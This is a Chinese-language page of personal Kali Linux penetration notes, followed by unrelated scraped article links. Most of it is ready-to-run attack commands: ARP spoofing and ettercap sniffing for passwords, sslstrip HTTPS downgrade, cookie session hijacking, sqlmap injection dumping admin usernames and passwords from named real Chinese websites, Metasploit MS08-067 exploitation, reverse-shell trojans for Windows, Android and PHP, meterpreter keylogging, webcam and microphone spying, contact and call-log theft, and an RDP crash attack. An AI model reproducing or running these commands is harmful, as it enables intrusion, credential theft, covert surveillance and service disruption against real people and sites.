kali 渗透的一些笔记
kali实战笔记 17:55 2016/7/19 by: _Silvers
kali系统安装后的配置及美化
安装vmwareTools
tar zxvf VMwareTools-sfsfsfasfasfsaf #解压安装包
cd 到解压后的安装目录
./ 绿色的可执行文件 #进行安装
# 等待安装结束,期间根据提示进行y/n确定
reboot # 重启kali
kali系统更新及替换国内软件源
leafpad /etc/apt/sources.list
注释掉官方的更新源
复制国内的更新源 #可百度国内更新源地址(新手推荐阿里云的源)
更新系统
apt-get update #更新系统
apt-get dist-upgrade #安装更新
kali的美化
apt-get install kde-full #kde桌面的安装
端口扫描
nmap -sS 目标ip
Arp 内网断网
Arpspoof -i 网卡 -t 目标ip 网关
获取网卡/网关
ifconfig
获取内网ip
fping -asg 192.168.1.0/24
Arp 欺骗
echo 写命令,是不会有回显的
ehco 1 >proc/sys/net/ipv4/ip_forward
# 进行IP流量转发
目标 --》 我的网卡 --》网关
driftnet --> 获取本机网卡的图片
driftnet -i eth0 获取本机网卡的图片
ifconfig #查看网络信息
iwconfig #查看网卡信息
kali中查找程序或命令
ex:sqlmap
find / -name sqlmap
find / -name ettercap
桌面美化工具 雨滴.exe (window)
==============================================================================
HTTP 帐号密码获取
Arpspoof --> 欺骗
Ettercap --> 欺骗 DNS欺骗 流量 嗅探
实战前的信息采集:
目标机器: 目标ip,网关
攻击机器: kali ip
arpspoof -i eth0 -t 目标ip 网关
开启ip转发
echo 1 >/proc/sys/net/ipv4/ip_forward
cat 查看内容
cat /proc/sys/net/ipv4/ip_forward
启动ettercap进行流量嗅探
ettercap -Tq -i eth0
-Tq --> -T: 启动文本模式,q:安静模式;
-i --> i: 网关;
url解码:www.convertstring.com
HTTPS 账户密码获取
进入kali文本模式
在进入输入用户名界面按ctrl+alt+F1
开启SSH链接服务
一、配置SSH参数
修改sshd_config文件,命令为:
vi /etc/ssh/sshd_config
将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes
将PermitRootLogin without-password修改为
PermitRootLogin yes
Kali 2.0使用SSH进行远程登录
然后,保存,退出vim。
二、启动SSH服务
命令为:
/etc/init.d/ssh start
或者
service ssh start
查看SSH服务状态是否正常运行,命令为:
/etc/init.d/ssh status
或者
service ssh status
/etc/init.d/ssh start
==========================
vim /etc/ettercap/etter.conf
修改iptables规则
去掉注释符号
保存推出
sslstrip --》 可以把HTTPS还原为http
arpspoof -i eth0 -t 目标ip 网关
开启ip转发
echo 1 >/proc/sys/net/ipv4/ip_forward
ettercap -Tq -i eth0
sslstrip -a -f -k
缺点:容易出现证书错误!
==============================
会话劫持
需要的工具
Arpspoof ==> Arp欺骗
Wireshark ==> 抓包
ferret ==> 重新生成抓包后的文件
hamster ==> 重放流量
#trip1:基于arp欺骗
arpspoof
arpspoof -i eth0 -t 目标ip 网关
echo 1 >/proc/sys/net/ipv4/ip_forward
start Wireshark #开始抓包
ferret -r cockie.pcap #生成hamster.txt
#trip2:基于ferret
ferret -1 eth0
hamster
#trip3:基于CookieCadger.jar一键劫持
install CookieCadger
选择网卡
动态截取流量
======================================================
SqlMap
asp 网站,大多用的Access 文件 数据库 MSSQL数据库
数据库
表
字段(列)
sqlmap -u http://www.baidu.com
-u 检测是否存在注入
成功,返回数据库信息
sqlmap -u www.baidu.com --tables
暴力猜解所有表名(有点慢)
sqlmap -u http://www.baidu.com --columns -T "user"
--columns 猜列名 根据user
sqlmap -u "http://www.baidu.com" --dump -C "username,password" -T "user"
--dump 下载数据 -C "username,password"列名
php 网站, 大多用Mysql
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --is-dba
back-end DBMS:MySQL >= 5.0.0
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dbs
列出所有数据库
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --current-db
查找自己的数据库
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"
猜解(查询)所有表名 根据 ggec
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --columns -T "ggec_admin" -D "ggec"
查询 所有的列
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dump -C "username,password" -T "ggec_admin" -D "ggec"
查询列的字段
www.cmd5.com md5在线加解密站点
====================================
sqlmap cookie注入
sqlmap -u "http://www.wisefund.com.cn/about.asp" --cookie "id=56" --level 2
--cookie "" 这里写id的参数,如果是cookie注入,就要把等级提升为level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --tables --cookie "id=56" --level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --columns -T "user" --cookie "id=56" --level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --dump -C "username,password" -T "user" --cookie "id=56" --level 2
===========================================================================================================================
Metasploit 基础
Exploit 模块 -- 》 漏洞利用
Payloads -- 》 shellCode
use exploit/windows/smb/ms08_067_netapi
选择漏洞利用模块
show options
查看要填入的参数
set RHOST 192.168.1,100
set PAYLOAD window/meterpreter/reverse_tcp
RHOST --> 目标IP
LHOST --> 本机IP
exploit --》 执行操作
实施攻击成功则反馈
msfconsole 从终端启动metasploit
background
sessions -i number
木马 :控制端 服务端
控制远程 木马程序
a.根据自己的IP生成一个马
我的IP 192.168.1.103 55555
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=55555
X> test.exe
这么下来,就会生成一个test.exe的木马程序
b. use exploit/multi/handler
使用handler这个模块
set PAYLOAD windows/meterpreter/reverse_tcp
使用这个shellcode
LHOST = 192.168.1.103
LRORT = 55555
这里填写 生成木马的IP和端口
c. 先执行msf,再执行马
木马的使用
注入进程:木马随时有可能被结束掉的
ps: 得到我们要注入的PID进程
2036 2004 explorer.exe 桌面进程
migrate 2036 #注入进程
远程桌面的开启:
Run vnc 开启远程桌面
文件管理功能
Downlaod 下载文件
Edit 编辑文件
Cat 查看文件
mkdir 创建文件
Mv 移动文件
Rm 删除文件
Upload 上传文件
Rmdir 删除文件夹
查看PHP文件: cat hack.php
下载文件: download hack.php
删除文件: rm hack.php
上传文件: upload hack.php
网络及系统操作
Arp 查看ARP缓冲表
Ifconfig 查看IP地址网卡
Getproxy 获取代理
Netstat 查看端口链接
kill 杀死进程
ps 查看进程
reboot 重启机器
reg 修改注册表
shell 获取shell
shutdown 关机
sysinfo 获取电脑信息
用户操作和其他功能讲解
enumdesktops 窗体
keyscan_dump 键盘记录 -- 下载
keyscan_start 键盘记录 -- 开始
keyscan_stop 键盘记录 -- 停止
Uict1 获取键盘鼠标控
uictl disable keyboard/mouse 禁用键盘/鼠标
uictl enable keyboard/mouse 启用键盘/鼠标制权
record_mic 音频录制
record_mic -d 10 后台录音10秒
webcam_chat 查看摄像头接口
webcam_list 查看摄像头列表
webcam_stream 摄像头视频获取
GetSystem 获取高权限
Hashdump 下载hash
=========================================================
Metasploit Androd实战笔记
Msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.103 LPROT=55555
R > test.apk
Search 搜索 jpg,png,bmp
Download 下载 jpg,png,bmp
webcam_snap 手机截屏
webcam_stream -i [1:2?] 手机摄像头监控
check_root 检测Root
dump_calllog 下载电话记录
dump_contacts 下载信息记录
Geolocate 定位
==================================================
Metasploit服务器蓝屏攻击
DDos
服务器开启 3389
确定目标: 192.168.1.103
MS12 020
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
服务器远程桌面的一个可用模块
auxiliary/scanner/rdp/ms12_020_check
扫描主机是否存在漏洞
RHOST R开头,远程主机
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
目的:比DDos来的更直接一些
Metasploit生成webshell
a.在msf中生成一个PHP脚本
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.101 R > web.php
生成一个PHP脚本
cat 查看文件内容
kali 渗透的一些笔记的更多相关文章
- kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail
kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...
- kali渗透综合靶机(一)--Lazysysadmin靶机
kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...
- kali渗透综合靶机(十八)--FourAndSix2靶机
kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...
- kali渗透综合靶机(十七)--HackInOS靶机
kali渗透综合靶机(十七)--HackInOS靶机 靶机下载地址:https://www.vulnhub.com/hackinos/HackInOS.ova 一.主机发现 1.netdiscover ...
- kali渗透综合靶机(十六)--evilscience靶机
kali渗透综合靶机(十六)--evilscience靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --ra ...
- kali渗透综合靶机(十五)--Breach-1.0靶机
kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...
- kali渗透综合靶机(十四)--g0rmint靶机
kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一.主机发现 1.netdiscover - ...
- kali渗透综合靶机(十三)--Dina 1.0靶机
kali渗透综合靶机(十三)--Dina 1.0靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate= ...
- kali渗透综合靶机(十二)--SickOs1.2靶机
kali渗透综合靶机(十二)--SickOs1.2靶机 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/ 一.主机发现 1.netdiscover ...
随机推荐
- 2016 Multi-University Training Contest 1 H.Shell Necklace
Shell Necklace Time Limit: 16000/8000 MS (Java/Others) Memory Limit: 65536/65536 K (Java/Others)T ...
- 说说 js String
首先说说js的字符串,说到字符串这个就和我们原来的C# 代码有区别的就是,js里面没有chart类型.就是说他里面的 “ ”和‘ ’是要表达一样的意思. 其实这个里面就有一个问题了特别实在拼接字符串的 ...
- Linux install SMplayer
sudo apt-add-repository ppa:rvm/smplayer sudo apt-get update sudo apt-get install smplayer smplayer- ...
- 微信企业号办公系统-图片预览放大功能-previewImage
在微信里看过文章的应该知道,文章里的图片点击后可以放大.分享和保存. 然而自己在微信里开发的网页,里面的图片点击后没办法实现这个效果,然后就去看了下微信JS文档,里面有个previewImage可以调 ...
- java分享第七天-02(读取文件)
一 读取文件 public static void main(String[] args) throws FileNotFoundException, IOException { // 建立File对 ...
- Win 10 文件浏览器无法打开
今天遇到个很奇怪的问题,文件浏览器File Explorer无法正常显示,点击打开后任务栏上已经显示打开了,但是屏幕上却看不到任何窗口,开始以为机子中了恶意的木马,然后就疯狂的查毒,然而并没有解决问题 ...
- window自动任务实现数据库定时备份
原理:利用window定时任务定时cmd加载mytask.bat文件,bat运行php.exe程序编译运行mytask.php文件 ,从而实现了数据库的备份 mytask.bat 内容: D:\php ...
- 将List下载到本地保存为Excel
直接附上代码 /// <summary> /// 将List保存为Excel /// </summary> /// <typeparam name="T&quo ...
- JavaScript如何使用this
学习this的使用必须牢记以下两点 1.this是一个只能在函数内部使用的关键字 2.this指向调用函数的那个对象 下面我们来具体讨论一下this的具体使用方法 第一种:通过函数调用的方式----- ...
- cuplayer酷播播放器 swf 带参数直接播放
客户需要使用cuplayer,直接调用swf 播放器. /Player/player.swf?FlvID=745,此处写入视频ID; 官方给的例子,运行是有问题的. http://www.cuplay ...